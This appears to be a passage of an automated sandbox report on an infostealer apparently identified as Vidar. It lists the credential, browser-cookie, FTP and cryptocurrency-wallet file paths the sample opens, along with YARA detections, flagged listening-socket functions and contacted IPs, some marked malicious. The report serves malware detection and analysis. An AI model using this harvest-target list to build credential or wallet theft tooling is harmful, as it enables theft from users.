Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2761033099.000000000052A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2761033099.0000000000530000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: info.seco
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2761033099.000000000052A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2761033099.0000000000530000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe, 00000000.00000002.2761033099.000000000052A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2761033099.0000000000530000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: MultiDoge
Source: file.exe, 00000000.00000002.2761033099.000000000052A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: seed.seco
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 5012, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.3.file.exe.40d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.40d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.40a0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.40a0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2761033099.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2206480841.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5012, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9D0C40 sqlite3_bind_zeroblob,	0_2_6C9D0C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9D0D60 sqlite3_bind_parameter_name,	0_2_6C9D0D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8F8EA0 sqlite3_clear_bindings,	0_2_6C8F8EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9D0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C9D0B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8F6410 bind,WSAGetLastError,	0_2_6C8F6410
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA389592A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFDA389592A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38CAEAA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFDA38CAEAA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0A1F9A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFDAC0A1F9A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0D290A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFDAC0D290A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0EB7E8 bind,	23_2_00007FFDAC0EB7E8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0F41DA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFDAC0F41DA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC1215FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFDAC1215FA

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
184.185.247.130	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
209.99.203.131	unknown	United States	12282	GMAUS	false
216.9.179.60	unknown	United States	17385	ORBITELUS	false
73.38.186.219	unknown	United States	7922	COMCAST-7922US	false
45.8.98.78	unknown	Russian Federation	395800	GBTCLOUDUS	true
95.165.139.85	unknown	Russian Federation	25513	ASN-MGTS-USPDRU	false
204.8.84.94	unknown	United States	32641	ARBINET-INTERNALUS	true
23.192.247.89	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
173.230.128.232	unknown	United States	63949	LINODE-APLinodeLLCUS	false
82.165.57.155	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
24.92.16.253	unknown	United States	33363	BHN-33363US	false
139.59.20.27	unknown	Singapore	14061	DIGITALOCEAN-ASNUS	false
77.91.101.71	arpdabl.zapto.org	Russian Federation	42861	FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	false
5.75.212.60	unknown	Germany	24940	HETZNER-ASDE	false
91.149.237.69	unknown	Poland	41952	MARTON-ASPL	false
91.92.250.213	unknown	Bulgaria	34368	THEZONEBG	false
81.6.45.56	unknown	Switzerland	13030	INIT7CH	false
